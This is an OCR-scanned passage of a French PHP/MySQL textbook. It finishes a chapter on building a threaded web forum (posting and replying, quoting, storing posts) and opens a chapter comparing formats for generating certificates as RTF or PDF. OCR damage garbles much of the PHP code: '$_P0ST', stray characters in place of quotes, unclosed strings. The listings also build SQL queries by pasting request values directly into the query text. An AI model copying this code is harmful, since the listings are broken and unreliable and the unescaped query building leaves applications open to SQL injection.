rer l'en-tete d'un article et son contenu, puis elle les assemble dans un seul tableau 
associatif qui est ensuite renvoye. 

Les resultats de cette fonction sont ensuite passes a la fonction display post() de 
output Jns.php. Celle-ci se contentant d'afficher le tableau et d'ajouter un formatage 
HTML, nous ne l'etudierons pas ici. 

Pour terminer, le script view _post.php verifie si cet article possede des reponses et 
appelle display tree( ) pour les afficher dans le format adequat, c'est-a-dire en deve- 
loppant tous les noeuds et en supprimant tous les symboles "+" et " ". 

Ajouter de nouveaux articles 

Apres tout cela, nous pouvons nous interesser a la maniere dont les nouveaux articles 
sont ajoutes dans le forum. Un utilisateur peut avoir recours a deux methodes : il peut 
cliquer sur le bouton New Post dans la page principale, ou cliquer sur le bouton Reply 
dans la page view _post.php. 

Ces actions activent le meme script, new _post.php, mais avec differents parametres. La 
Figure 29.8 represente la sortie de new _post.php lorsque l'utilisateur a clique sur le 
bouton Reply. 
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File Edit View History Bookmarks Tools Help 
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Re: using gd 
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dynamically create buttons? 





Post 







Dane 



Figure 29.8 

Dans les reponses, le texte de /'article d'origine est automatiquement recopie et indente. 

Examinons tout d'abord l'URL : 

http: //localhost/phpmysql4e/chapitre29/new_post . php?parent=5 

Le parametre passe dans parent correspond au postid du parent du nouvel article. Si 
l'utilisateur clique sur le bouton New Post au lieu de Reply, vous trouverez parent=0 
dans l'URL. 

En outre, le texte du message d'origine est recopie et precede du caractere >, comme 
pour la plupart des programmes de lecture d'e-mails et de news. 

Enfin, vous remarquerez que le titre du message correspond au titre du message 
d'origine precede de "Re : ". 

Passons maintenant au code qui produit cette sortie et qui est presente dans le 
Listing 29.8. 

Listing 29.8 : new jtostphp — Ce script permet a un utilisateur de saisir un nouvel 
article ou de repondre a un article existant 



<?php 

include ( ' include_f ns . php 1 ) ; 

$title = $_P0ST[ 'title' ] ; 
$poster = $_P0ST[ 'poster' ] ; 



Chapitre 29 



Implementation d'un forum web 763 



$message = $_POST[ 1 message '] ; 

if (isset($_GET[ 'parent ']) ) { 
$parent = $_GET[ ' parent '] ; 
} else { 
$parent = $_POST[ 1 parent 1 ] ; 

} 

if(!$area) { 
$area = 1 ; 

} 

if(!$error) { 
if(!$parent) { 
$parent = 0; 
if(!$title) { 
$title = 'New Post 1 ; 

} 

} else { 

// Recuperation du titre de l'article. 
$title = get_post_title($parent) ; 

// Ajout de 1 Re: ' 

if (strstr($title, 'Re: ') == false) { 
$title = 'Re: ' .$title; 

} 

// Garantit que le titre tiendra bien dans la BD 
$title = substr($title, 0, 20); 

// Ajoute un motif de citation a l'article auquel on repond. 
$message = add_quoting(get_post_message($parent) ) ; 

} 

} 

do_html_header($title) ; 

display_new_post_form($parent, $area, $title, $message, 
$poster) ; 

if($error) { 

echo "<p>Your message was not stored. </p> 

<p>Make sure you have filled in all fields and 
try again . </p>" ; 

} 

do_html_f ooter( ) ; 



Apres une configuration initiale, ce script verifie si le parent vaut 0. Si c'est le cas, il 
s'agit d'un nouveau sujet et il faut passer par quelques etapes supplementaires. 

S'il s'agit d'une reponse ($parent contient le postid d'un article existant), le script 
continue et recopie le titre et le texte du message d'origine, comme ceci : 
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II Recuperation du titre de 1' article. 
$title = get_post_title($parent) ; 

// Ajout de 'Re: ' 

if (strstr($title, 'Re: ') == false) { 
$title = 'Re: ' .$title; 

} 

// Garantit que le titre tiendra bien dans la BD 
$title = substr($title, 0, 20); 

// Ajout d'un motif de citation a l'article auquel on repond. 
$message = add_quoting(get_post_message($parent) ) ; 

Ce code fait appel aux fonctions get post title(), get post message() et 
add quoting (), qui se trouvent toutes dans la bibliotheque discussion_fns.php. Elles 
sont presentees respectivement dans les Listings 29.9, 29. 10 et 29. 1 1 . 

Listing 29.9 : La fonction get _post_title() de discussion _fns.php — Cette fonction 
recupere le titre d'un message dans la base de donnees 



function get_post_title($postid) { 

// Extrait le titre d'un article a partir de la BD. 

if(!$postid) { 
return ' ' ; 

} 

$conn = db_connect( ) ; 

// Recupere toutes les informations d'en-tete a partir de la 
// table 'header' 

$query = "select title from header 

where postid = '".$postid. ; 
$result = $conn->query ($query) ; 
if ($result->num_rows ! =1 ) { 
return ' ' ; 

} 

$this_row = $result->f etch_array ( ) ; 
return $this_row[0] ; 

} 



Listing 29.10 : La fonction get _post_message() de discussion_fns.php — Cette fonction 
recupere le contenu d'un message dans la base de donnees 



function get_post_message($postid) { 

// Extrait le contenu d'un article a partir de la BD. 

if(!$postid) { 
return ' ' ; 

} 
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$conn = db_connect() ; 

$query = "select message from body 

where postid = '".$postid." 
$result = $conn->query ($query) ; 
if ($result->num_rows>0) { 

$this_row = $result->f etch_array ( ) ; 

return $this_row[0] ; 

} 



Ces deux premieres fonctions recuperent, respectivement, le titre et le contenu d'un 
article a partir de la base de donnees. 

Listing 29.11 : La fonction add_quoting() de discussion jfns.php — Cette fonction 
indente le texte d'un message avec le symbole "> M 



function add_quoting ($string , $pattern ='>'){ 

// Ajoute un motif de citation pour marquer le texte cite dans 

// votre reponse. 
return $pattern . str_replace ( " \n " , " \n$pattern" , $string); 
} 



La fonction add quoting ( ) reformate la chaine de caracteres pour ajouter le caractere 
> au debut de chaque ligne. 

Apres avoir saisi sa reponse et clique sur le bouton Post, l'utilisateur arrive sur le script 
store_new _post.php, qui produit un resultat comme celui de la Figure 29.9. 



Figure 29.9 

Le nouvel article est 
desormais visible 
dans I'arborescence. 



History Bookmarks T« 
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Discussion Posts 



New Post Expand Collapse; 



l+l PHP setup? - Fred - 09:05 07/20/2008 
ffl persistence - archer - 09:07 07/20/2008 
new article - Mary - 09:08 07/20/2008 
cql vs module? - big coder - 09:08 07/20/2008 
H using qd - newbie - 09:08 07/20/2008 
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Le nouvel article est disponible sous le titre Re : using gd? Laura 01:09 07/07/ 
2004. Ceci mis a part, cette page ressemble a la page classique index.php. 

Passons maintenant au code de store_new _post.php presente dans le Listing 29.12. 

Listing 29.12 : store_new _post.php — Ce script ajoute le nouvel article dans la base de 
donnees 



<?php 

include ( ' include_f ns . php ' ) ; 
if($id = store_new_post($_POST) ) { 

include ('index.php'); 
} else { 

$error = true; 

include ( ' new_post . php ' ) ; 

} 

?> 



Comme vous pouvez le constater, ce script est assez court puisque son role principal 
consiste a appeler la fonction store new post ( ) , presentee dans le Listing 29. 13. Cette 
page n'affiche aucune information. En cas de succes, nous revenons a la page generale ; 
sinon nous revenons a la page new _post.php pour que l'utilisateur puisse effectuer une 
nouvelle tentative. 

Listing 29.13 : La fonction store_new _post() de discussionjfns.php — Cette fonction 
valide et enregistre le nouvel article dans la base de donnees 



function store_new_post ($post ) { 

// Valide, nettoie et enregistre un nouvel article. 

$conn = db_connect ( ) ; 
// Verifie qu'aucun champ n'est vide, 
if ( !filled_out($post) ) { 
return false; 

} 

$post = clean_all($post) ; 

// Verifie s ' il existe un parent 
if ($post[ 'parent'] !=0) { 
$query = "select postid from header where 

postid = '" .$post[ ' parent '] ; 

$result = $conn->query ($query) ; 
if ($result->num_rows ! =1 ) { 
return false; 

} 

} 

// Verifie que ce n'est pas un doublon. 
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$query = "select header . postid from header, body where 
header . postid = body. postid and 
header . parent = " .$post[ ' parent ']. " and 
header. poster = '" .$post[ 'poster' ]." 1 and 
header. title = '" .$post[ ' title ']." 1 and 
header. area = " .$post[ 'area' ] . " and 
body .message = '" .$post[ 'message' ] ; 

$result = $conn->query ($query) ; 
if (!$result) { 
return false; 

} 

if ($result->num_rows>0) { 

$this_row = $result->f etch_array ( ) ; 
return $this_row[0] ; 

} 

$query = "insert into header values 
( ' " .$post[ 'parent' ] . " ' , 
' " .$post[ 'poster' ] . " ' , 
' " .$post[ 'title' ] . " 1 , 
0, 

' " .$post[ 'area' ] . " ' , 

now( ) , 

NULL 

)"; 

$result = $conn->query ($query) ; 
if (!$result) { 
return false; 

} 

// Notre parent a maintenant un fils : on le note 
$query = "update header set children = 1 

where postid = '" .$post[ ' parent '] ; 

$result = $conn->query ($query) ; 
if (!$result) { 
return false; 

} 

// Trouve notre postid. II pourrait y avoir plusieurs en-tetes 
// identiques, sauf cet id et, probablement, la date d'envoi. 

$query = "select header. postid from header left join body 
on header. postid = body. postid 
where parent = '". $post [' parent ']." ' 

and poster = '" .$post[ 'poster' ]." ' 

and title = "' .$post[ 'title' ]." ' 
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and body.postid is NULL"; 

$result = $conn->query ($query) ; 
if (!$result) { 
return false; 

} 

if ($result->num_rows>0) { 

$this_row = $result->f etch_array ( ) ; 
$id = $this_row[0] ; 

} 

if($id) { 

$query = "insert into body values 

($id, 1 " .$post[ 'message' ]."')"; 
$result = $conn->query ($query) ; 
if (!$result) { 
return false; 

} 

return $id; 

} 



Cette fonction est assez longue, mais elle n'est pas tres compliquee. Elle est longue 
parce que l'insertion d'un article necessite l'ajout d'entrees dans les tables contenant 
les en-tetes et les contenus, ainsi que la mise a jour du parent de 1' article dans la table 
header pour indiquer qu'il possede un enfant de plus. 

Cela termine notre etude de 1' application de forum web. 
Extensions 

Ce projet peut etre ameliore de plusieurs manieres : 

■ Vous pouvez ajouter des options de navigation et d'affichage, afin de pouvoir passer 
a 1' article suivant, au precedent, a 1' article suivant ou precedent dans le fil de discus- 
sion. 

■ Vous pouvez ajouter une interface d' administration pour installer de nouveaux 
forums et pour supprimer les anciens articles. 

■ Vous pouvez ajouter une authentication des utilisateurs afin que seuls les utilisa- 
teurs enregistres puissent envoyer des articles. 

l Vous pouvez ajouter un mecanisme de moderation ou de censure. 

N'hesitez pas a vous renseigner sur les systemes existants pour trouver d'autres idees. 
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Utiliser un systeme existant 

Phorum est un projet de forum web open-source. Son systeme de navigation est diffe- 
rent du notre, mais sa structure peut etre facilement personnalisee pour s'adapter a vos 
besoins. Une de ses caracteristiques les plus interessantes est qu'il peut etre configure 
par l'utilisateur pour afficher tous les articles, ou par fils de discussion. Vous trouverez 
plus d' informations sur ce programme sur le site http://www.phorum.org. 

Pour la suite 

Au Chapitre 30, nous verrons comment utiliser le format PDF pour fournir des docu- 
ments attractifs, coherents au niveau de l'impression et un peu plus securises que des 
documents classiques. Ces documents peuvent se reveler utiles pour un grand nombre 
d' applications produisant des services, comme la generation de contrats en ligne. 
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Sur les sites de services, nous devons parfois fournir des documents personnalises 
produits a partir d' informations saisies par les utilisateurs. Nous pouvons ainsi creer des 
formulaires qui sont remplis automatiquement ou des documents personnalises, comme 
des documents legaux, des lettres ou des certificats. 

L'exemple que nous etudierons dans ce chapitre permet d'afficher une page devaluation 
des connaissances et de generer un certificat. 

Presentation du projet 

Nous souhaitons proposer a nos visiteurs un examen compose de plusieurs questions. 
S'ils obtiennent une note suffisante, nous produirons un certificat indiquant qu'ils ont 
reussi l'examen. 

Pour que les notes puissent etre evaluees facilement par nos ordinateurs, l'examen sera 
presente sous la forme d'un QCM, c'est-a-dire que chaque question sera accompagnee 
de plusieurs propositions de solutions, dont une seule sera exacte. 
Si un utilisateur a trouve suffisamment de bonnes reponses, il obtient automatiquement 
un certificat. 

Dans l'ideal, le format de fichier pour ce certificat doit remplir les conditions suivantes : 

■ II doit etre facile a concevoir. 

■ II doit pouvoir contenir des elements tres differents, comme des images bitmap et 
des images vectorielles. 

■ II doit pouvoir etre imprime avec une bonne qualite. 
II ne faudrait telecharger qu'un petit fichier. 
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■ II doit etre produit presque instantanement. 

■ II doit pouvoir etre produit a faible cotit. 

■ II doit etre compatible avec un nombre maximal de systemes d' exploitation. 

■ II doit etre difficile a falsifier ou a modifier. 

■ II ne doit necessiter aucun logiciel special pour l'afficher ou pour l'imprimer. 

■ Son affichage et son impression doivent etre coherents sur tous les systemes. 

Comme pour beaucoup d'autres decisions, nous devrons probablement effectuer quel- 
ques compromis lors du choix du format final, afin de realiser la plus grande partie de 
ces objectifs. 

Evaluation des formats de documents 

La decision la plus importante que nous devrons effectuer concerne le choix du format 
des certificats. Nous pouvons choisir entre les supports papier, texte ASCII, HTML, 
RTF, PostScript, PDF, Microsoft Word ou le format d'un autre traitement de texte. 
D'apres les dix cri teres que nous venons de voir, nous pouvons tenter de comparer les 
differentes options qui s'offrent a nous. 

Papier 

Ce format offre des avantages evidents. Nous pouvons controler l'integralite du proces- 
sus et verifier chaque certificat avant de l'envoyer. Nous n'avons pas besoin de nous 
inquieter a propos des logiciels ou de la bande passante et les certificats peuvent etre 
imprimes avec des dispositifs particuliers empechant de les dupliquer. 

Ce format correspond done a toutes nos attentes, sauf que les certificats ne peuvent pas 
etre crees ni envoyes instantanement. En outre, un envoi par courrier traditionnel peut 
prendre plusieurs jours ou plusieurs semaines, en fonction de l'emplacement geogra- 
phique des destinataires. 

En outre, la production d'un certificat couterait quelques euros, pour l'impression et 
l'envoi, et probablement encore plus en manutention. Les methodes de transmission 
electroniques automatisees sont bien moins cheres. 

Texte ASCII 

L'envoi de documents en ASCII ou en texte brut possede egalement plusieurs avanta- 
ges. II n'existe dans ce cas aucun probleme de compatibilite. La bande passante neces- 
saire est tres reduite et les cotits sont ainsi tres faibles. Grace a la simplicite du resultat 
final, ce type de document est tres simple et tres rapide a generer par un script. 
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Cependant, si nous presentons un fichier ASCII a nos visiteurs, nous n'aurons qu'un 
controle tres reduit sur l'apparence de leur certificat. II est notamment impossible de 
controler les polices ou les sauts de page. Nous ne pouvons qu'inclure le texte impor- 
tant sans pouvoir influer sur le formatage. En outre, il est impossible de controler la 
duplication ou la modification des certificats. C'est la methode qui permet de falsifier 
les certificats le plus facilement. 

HTML 

Pour la transmission de documents sur le Web, on pense immediatement au format 
HTML, concu precisement dans ce but. Comme vous le savez probablement deja, ce 
format permet de controler l'apparence des documents, d'inclure des objets, par exem- 
ple des images, et il est compatible (moyennant quelques variations) avec de nombreux 
systemes d' exploitation et logiciels. II est de plus tres facile a implemented ce qui 
permet de simplifier la conception des certificats et de les produire rapidement avec un 
script avant de les transmettre automatiquement par Internet. 

Le format HTML presente cependant plusieurs inconvenients pour cette application : il 
n'offre qu'un support limite pour le formatage de l'impression, par exemple les sauts de 
page. II ne produit pas toujours des resultats tres uniformes sur les differentes plates- 
formes ou avec differents programmes. En outre, la qualite d'impression n'est pas 
toujours la meme. Enfin, bien que le format HTML permette d'inclure n'importe quel 
type d'element externe, les navigateurs ne peuvent pas toujours afficher certains types 
d' elements particuliers. 

Formats des traitements de texte 

Ce format n'est essentiellement interessant que pour les projets internes. Pour les projets 
sur Internet, ce type de format vous limite aux utilisateurs qui possedent les traitements de 
texte choisis. En raison de son importance sur le marche, le choix de Microsoft Word 
parait le plus logique car la plupart des utilisateurs ont acces a ce logiciel ou a un traitement 
de texte capable d'importer des documents Word, comme OpenOffice Writer. 

Les utilisateurs de Windows qui ne possedent pas Word peuvent telecharger un 
programme gratuit de lecture des documents Word a l'adresse http://www.micro- 
soft.com/office/000/viewers.asp . 

La creation d'un document au format Microsoft Word possede quelques avantages. Tant 
que vous possedez une copie de Word, la conception des documents est assez facile. En 
outre, l'impression peut etre controlee assez precisement et le contenu du document 
peut etre manie avec une grande souplesse. Vous pouvez egalement proteger vos documents 
de toute modification en les protegeant par un mot de passe. 
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Malheureusement, les fichiers Word ont tendance a etre particulierement volumineux, 
surtout s'ils contiennent des images ou d'autres elements complexes, et il n'existe 
aucun moyen simple de les produire dynamiquement avec PHP. Ce format est docu- 
mente, mais il s'agit d'un format binaire et sa documentation n'est fournie que sous 
certaines conditions de licence. On peut produire un document Word avec un objet 
COM, mais ce n'est vraiment pas une operation simple. 

Une autre possibilite consiste a envisager le recours au traitement de texte OpenOffice 
Writer, qui a l'avantage de ne pas etre un logiciel proprietaire et d'utiliser XML comme 
format de fichier. Office 2003 et 2007 prennent maintenant aussi en charge un format de 
fichier XML natif, et la DTD (Document Type Definition) qu'ils utilisent peut etre tele- 
chargee depuis le site www.microsoft.com. Recherchez "Office XML Reference 
Schemas". Cela pourrait etre une option possible, mais elle n'est pas simple. 

Rich Text Format 

Le format RTF est presque aussi complet que celui de Microsoft Word, mais les fichiers 
sont plus simples a produire. Nous pouvons toujours controler d'une maniere assez 
precise la presentation du document et son impression et il reste possible d'inclure 
certains elements, comme des images bitmap ou des images vectorielles. Nous sommes 
done a peu pres stirs que l'utilisateur obtiendra un resultat semblable au notre lorsqu'il 
affichera ou imprimera le document. 

Le format RTF est, en fait, le format texte de Microsoft Word. II s'agit d'un format 
d'echange permettant de transferer des documents entre differents programmes : d'une 
certaine maniere, il est done comparable au format HTML. II se sert d'une syntaxe 
particuliere et de certains mots cles a la place de donnees binaires pour formater les 
informations. II est par consequent relativement lisible pour les etres humains. 

Ce format est tres bien documente. Sa specification est disponible gratuitement en 
recherchant "RTF specification" sur le site de Microsoft. 

Le moyen le plus simple de produire un document RTF consiste a choisir 1' option Enre- 
gistrer sous puis RTF dans votre traitement de texte. Comme les fichiers RTF ne 
contiennent que du texte, il est possible de les produire directement et les documents 
existants peuvent etre facilement modifies. 

Ce format etant documente gratuitement, il est plus repandu que le format de Microsoft 
Word. II faut cependant savoir que, lorsqu'un fichier RTF complexe est ouvert avec les 
anciennes versions de Microsoft Word ou avec differents traitements de texte, les resul- 
tats sont souvent differents. Chaque nouvelle version de Word introduit de nouveaux 
mots-cles RTF qui ne sont pas toujours reconnus par les autres programmes. 
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Si Ton revient a notre liste de specifications, les certificats RTF sont assez faciles a conce- 
voir a l'aide de Word ou d'un autre traitement de texte. De plus, ces certificats peuvent 
contenir differents elements, comme des images bitmap et des images vectorielles, leur 
qualite d' impression est tout a fait suffisante, ils peuvent etre produits facilement et rapi- 
dement et ils peuvent etre envoyes a faible cout, par un moyen electronique. 

Ce format est compatible avec la plupart des applications et des systemes d'exploita- 
tion, bien que les resultats ne soient pas toujours les memes. D'un autre cote, les docu- 
ments RTF peuvent etre facilement et librement modifies par n'importe qui, ce qui peut 
poser probleme pour des certificats ou d'autres types de documents confidentiels. Leur 
taille peut devenir assez importante pour des documents complexes. 

Le format RTF est done une bonne option pour la plupart des applications d'envoi de 
documents et vous pouvez done le retenir. 

PostScript 

Le format PostScript d' Adobe est un langage de description de pages. II s'agit d'un 
langage de programmation complexe et tres puissant, destine a representer des docu- 
ments de maniere independante des plates-formes, e'est-a-dire que ce format decrit des 
documents qui seront representes de la meme maniere sur differents peripheriques, par 
exemple des imprimantes ou des ecrans. Ce format est tres bien documente et au moins 
trois livres y sont consacres, ainsi qu'un grand nombre de sites web. 

Un document PostScript peut contenir des elements de formatage tres precis, du texte, 
des images, des polices integrees et d'autres elements. II est assez facile de produire un 
document PostScript a partir d'une application en l'imprimant via un pilote d'impres- 
sion PostScript. Si cela vous interesse, vous pouvez meme apprendre a vous servir 
directement de ce langage de programmation. 

Les documents PostScript sont tres portables. Ils permettent d'obtenir des impressions 
coherentes et de haute qualite sur differents peripheriques et avec differents systemes 
d'exploitation. 

Cependant, la distribution des fichiers PostScript souffre de plusieurs inconvenients : 
les fichiers peuvent etre volumineux et la plupart des utilisateurs devront telecharger 
des logiciels supplementaires pour pouvoir les utiliser. 

La plupart des utilisateurs d'Unix peuvent produire directement les fichiers PostScript, 
mais les utilisateurs de Windows devront telecharger d'autres logiciels, comme GSview, 
qui se sert de l'interpreteur PostScript Ghostscript. Ce programme est disponible pour 
plusieurs plates-formes mais, bien qu'il soit disponible gratuitement, il ne parait pas 
raisonnable d'obliger les utilisateurs a telecharger des logiciels supplementaires. 
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Vous trouverez plus d' informations sur Ghostscript sur le site http://www.ghosts- 
cript.com/ et vous pouvez le telecharger sur le site http://www.cs.wisc.edu/~ghost/. 

Pour notre application, le format PostScript est tres interessant car il permet d'obtenir 
des impressions coherentes et de haute qualite, mais il ne remplit pas la plupart de nos 
autres conditions. 

Portable Document Format 

Heureusement, il existe un format presque aussi puissant que PostScript, mais qui lui 
ajoute plusieurs avantages significatifs. Le format PDF (qui a egalement ete cree par 
Adobe) a ete concu pour distribuer des documents qui doivent se comporter de maniere 
coherente sur differentes plates-formes et qui doivent fournir des resultats de haute 
qualite, a la fois sur un ecran et sur papier. 

Adobe decrit ainsi le format PDF : "Un standard ouvert de facto pour la distribution des 
documents electroniques dans le monde. Le format PDF est un format de fichier univer- 
sel qui preserve les polices, le formatage, les couleurs et les images de n'importe quel 
document, quelles que soient 1' application et la plate-forme utilisees lors de sa creation. 
Les fichiers PDF sont compacts et peuvent etre partages, affiches, parcourus et impri- 
mes de maniere precise par n'importe quelle personne possedant Adobe Acrobat 
Reader." 

Le format PDF est un format ouvert et sa documentation est disponible gratuitement sur 
le site http://partners.adobe.com/asn/tech/pdf/specifications.jsp ainsi que sur 
plusieurs autres sites web et dans un livre officiel. 

Compte tenu de nos specifications, le format PDF est done tres interessant : les docu- 
ments PDF fournissent une sortie coherente et de haute qualite, ils peuvent integrer des 
elements complexes comme des images bitmap ou des images vectorielles, ils peuvent 
etre compresses, transmis electroniquement et sont utilisables sur la plupart des systemes 
d'exploitation. En outre, ils peuvent integrer des controles de securite. 

En revanche, 1' inconvenient principal de ce format est qu'une majeure partie des logi- 
ciels permettant de creer des documents PDF sont payants. Pour lire les fichiers PDF, il 
faut disposer d'un logiciel de lecture adapte, mais Acrobat Reader est disponible gratui- 
tement pour Windows, Unix et Macintosh. La plupart des visiteurs de votre site auront 
probablement deja l'habitude de l'extension .pdf, et il y a de fortes chances qu'ils aient 
deja installe ce programme de lecture. 

Les fichiers PDF constituent done un bon moyen de distribuer des documents attractifs 
et imprimables, en particulier si vous ne souhaitez pas qu'ils soient facilement modifiables. 
Dans ce projet, nous presenterons deux manieres de produire un certificat PDF. 
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Les composants de la solution 

Pour que notre systeme fonctionne, nous devons pouvoir evaluer les connaissances des 
utilisateurs et produire des certificats pour ceux qui reussissent l'examen. Pour ce 
projet, nous allons presenter trois methodes permettant de generer ces certificats : a 
partir d'un modele RTF, a partir d'un modele PDF et en produisant un nouveau document 
PDF par programme. 

Voyons maintenant quels sont les composants necessaries pour notre application. 
Systeme devaluation 

II serait assez complexe de creer un systeme souple pour 1'evaluation en ligne, qui 
permette a la fois de poser differentes questions, plusieurs types de supports pour les 
informations presentees, des renseignements interessants a propos des reponses erronees 
et des statistiques intelligentes dans un rapport complet. 

Ici, nous nous interessons surtout a la production de documents personnalises transmis- 
sibles sur le Web, c'est pourquoi nous nous contenterons d'un systeme de QCM assez 
simple. 

Ce QCM ne repose sur aucun logiciel particulier. II passe par un formulaire HTML 
pour poser les questions et par un script PHP pour traiter les reponses. C'est ce que 
nous faisons depuis le Chapitre 1 . 

Logiciel de generation des documents 

Aucun logiciel supplementaire n'est necessaire sur le serveur web pour produire des 
documents RTF ou PDF a partir de modeles, mais vous aurez besoin de certains logi- 
ciels pour creer ces modeles. Pour pouvoir utiliser les fonctions PHP de creation de 
documents PDF, il faut compiler les outils de support de PDF avec PHP. Nous y reviendrons 
dans un instant. 

Logiciel pour la creation des modeles RTF 

Vous pouvez utiliser le traitement de texte de votre choix pour produire des fichiers 
RTF. Nous nous sommes servis de Microsoft Word pour creer notre modele de certifi- 
cat. Vous retrouverez ce modele sur le site Pearson, dans le repertoire chapitre30. 

Si vous preferez passer par un autre traitement de texte, il est quand meme conseille de 
tester le resultat obtenu avec Microsoft Word, car c'est le logiciel dont se serviront la 
plupart de vos utilisateurs. 
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Logiciel pour la creation des modeles PDF 

Les documents PDF sont un peu plus complexes a produire. Le plus simple est encore 
d'acheter Acrobat d'Adobe, qui permet de creer des documents PDF de haute qualite a 
partir de differentes applications. C'est lui dont nous nous sommes servis pour creer le 
fichier modele de ce projet. 

Pour creer ce fichier, nous avons d'abord utilise Microsoft Word pour concevoir un docu- 
ment. L'un des outils fournis avec Acrobat est Adobe Distiller. Avec cette application, il 
faut choisir quelques options qui ne sont pas selectionnees par defaut. Le fichier doit etre 
enregistre au format ASCII et la compression doit etre desactivee. Apres avoir selectionne 
ces options, la creation du document PDF est aussi simple qu'une impression classique. 

Vous trouverez plus d' informations sur Acrobat sur la page http://www.adobe.com/ 
products/acrobat/ et vous pourrez l'acheter en ligne, ou passer par un magasin d'infor- 
matique traditionnel. 

Pour creer des documents PDF, vous pouvez egalement passer par le programme 
ps2pdf, qui, comme son nom l'indique, convertit des fichiers PostScript en fichiers 
PDF. II a l'avantage d'etre gratuit, mais sa qualite laisse a desirer pour les documents 
contenant des images ou des polices non standard. Le convertisseur ps2pdf est fourni 
avec la bibliotheque Ghostscript dont nous venons de parler. 

Naturellement, si vous avez 1' intention de creer un fichier PDF de cette maniere, il faut 
commencer par creer votre fichier en PostScript. Les utilisateurs d'Unix se serviront 
pour cela des utilitaires classiques a2ps ou dvips. 

Si vous travaillez dans un environnement Windows, vous pouvez egalement creer des 
fichiers PostScript sans Distiller, moyennant un processus un peu plus complexe consis- 
tant a installer un pilote d' impression PostScript. Vous pouvez, par exemple, vous servir 
du pilote de l'imprimante LaserWriter IINT d'Apple. Si vous n'avez installe aucun pilote 
PostScript, vous pouvez en charger un sur le site d'Adobe, http://www.adobe.com/ 
support/downloads/product.jsp?product=44&pIatform= Windows. 

Pour creer votre fichier PostScript, il suffit ensuite de selectionner cette imprimante et 
de choisir l'option Imprinter dans un fichier, qui se trouve en general dans la boite de 
dialogue d'impression. 

La plupart des applications Windows generent alors un fichier avec 1' extension .prn 
mais, comme il s'agit d'un fichier PostScript, il vaut mieux changer cette extension en 
.ps. Vous devriez etre capable de l'afficher avec GSview ou un autre programme d'affi- 
chage de fichiers PostScript, ou de creer un fichier PDF avec ps2pdf . 

N'oubliez pas que la qualite du fichier PostScript obtenu depend du pilote choisi. Vous 
verrez que certains fichiers generes de cette maniere produisent des erreurs lorsque 
vous les passez a l'utilitaire ps2pdf . Dans ce cas, nous vous suggerons de choisir un 
autre pilote d'imprimante. 
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Si votre intention est de creer uniquement quelques fichiers PDF, le service en ligne 
d' Adobe peut etre suffisant. Pour 9,99 euros par mois, vous pouvez envoyer des fichiers 
dans differents formats et recuperer les fichiers PDF equivalents. Ce service s'est revele 
tout a fait adapte pour la creation de nos certificats, mais il ne permet pas de selection- 
ner certaines options importantes pour ce projet. En effet, le fichier PDF obtenu est 
enregistre dans un fichier binaire compresse, qui est done tres difficilement modifiable. 

Vous trouverez ce service a l'adresse http://createpdf.adobe.com/. 

Ce service propose egalement une option devaluation gratuite et vous pouvez utiliser le 
service gratuit de http://www.adobe.com si vous avez moins de cinq PDF a produire. 

II existe egalement une interface FTP au programme ps2pdf , sur le site Net Distillery, 
http://www.babinszki.com/distiller/. 

Une derniere option consiste a encoder le certificat en XML et a utiliser des XSLT 
(XML Style Sheet Transformations) pour le convertir en PDF et dans tout autre format 
desire. Cette methode requiert une bonne comprehension de XSLT et ne sera done pas 
traitee ici. 

Logiciels pour creer des fichiers PDF a partir d'un programme 
PHP permet de creer des documents PDF grace a ses fonctions PDFlib qui utilisent la 
bibliotheque PDFlib, disponible sur le site http://www.pdflib.com/products/pdflib- 
family/, qui fournit une API permettant de creer des documents PDF. 

Cette bibliotheque n'est ni libre ni gratuite : pour l'utiliser, vous devez acquerir une 
licence commerciale. PDFlib Lite est disponible en open-source et est gratuite sous 
certaines conditions, pour une utilisation non commerciale, notamment. 

Certaines bibliotheques gratuites, comme FPDF, commencent a apparaitre. FPDF n'est 
pas encore aussi fournie en fonctionnalites que ne le sont les bibliotheques commercia- 
les. En outre, FPDF etant ecrite en PHP (au lieu de l'etre en C comme extension PHP), 
elle est un peu plus lente que les deux autres. Vous pouvez la telecharger a l'adresse 
http://www.fpdf.org/. 

Dans ce chapitre, nous utilisons PDFlib, car il s'agit probablement de l'extension la 
plus couramment utilisee. 

Pour savoir si PDFlib est deja installee sur votre systeme, examinez la sortie de la fonc- 
tion phpinf o( ). Dans la section pdf, vous verrez si PDFlib est installee et, si e'est le 
cas, son numero de version. 

Si vous projetez d'inserer des images TIFF ou JPEG dans vos documents PDF, vous devez 
commencer par installer la bibliotheque TIFF, disponible sur le site http://www.Iibtiff.org, 
et la bibliotheque JPEG, disponible sur le site ftp://ftp.uu.net/graphics/jpeg/. 
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Si l'extension PDFLIB n'est pas integree a votre installation de PHP, vous devez recu- 
perer les fichiers a partir de PECL (PHP Extension Community Library) et l'installer 
manuellement. 

Sur les systemes non Windows, recuperez les fichiers a partir de http://pecl.php.net/ 
package/pdflib et installez-les a l'aide de la commande peel en ayant soin de lire les 
instructions de la page http://www.php.net/manual/en/install.pecl.pear.php. 

Avec Windows, recuperez l'extension precompilee (php _pdf.dll) en telechargeant ce 
fichier a partir de http://pecl4win.php.net/ext.php/php_pdflib.dll ou en telechargeant 
toute la bibliotheque des extensions PECL compilees a partir de la page de telecharge- 
ment de PHP.net. Puis placez le fichier php _pdflib.dll dans le repertoire des extensions 
PHP (generalement le sous-repertoire ext du repertoire d'installation de PHP) et ajoutez 
la ligne suivante a php. ini : 

extension=php_pdf . dll 



Presentation de la solution 

Nous allons mettre en ceuvre un systeme pouvant produire trois resultats possibles. 
Comme le montre la Figure 30. 1 , nous allons poser les questions du QCM, evaluer les 
reponses donnees et generer un certificat en choisissant l'une des trois methodes 
suivantes : 

■ production d'un document RTF a partir d'un modele vierge ; 

■ production d'un document PDF a partir d'un modele vierge ; 

■ production d'un document PDF par programme avec PDFlib. 



Figure 30. 1 
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Le Tableau 30.1 resume les fichiers necessaries a 1' application. 



Tableau 30.1 : Les fichiers de I 

Nom Type 



application de certification 

Description 



index . html 
score . php 
rtf . php 

pdf . php 



Page HTML 

Application 

Application 

Application 



pdf lib. php Application 

signature . png Image 

PHPCertificat RTF 
ion . rtf 

PHPCertificat PDF 
ion . pdf 



Le formulaire HTML contenant les questions du QCM 

Le script permettant d'acceder aux reponses des utilisateurs 

Le script permettant de produire le certificat RTF a partir du 
modele 

Le script permettant de produire le certificat PDF a partir du 
modele 

Le script permettant de produire le certificat RTF avec PDFlib 

L'image bitmap de la signature a ajouter aux certificats 
produits par PDFlib 

Modele de certificat RTF 
Modele de certificat PDF 



Passons maintenant au code de cette application. 



Poser les questions du QCM 

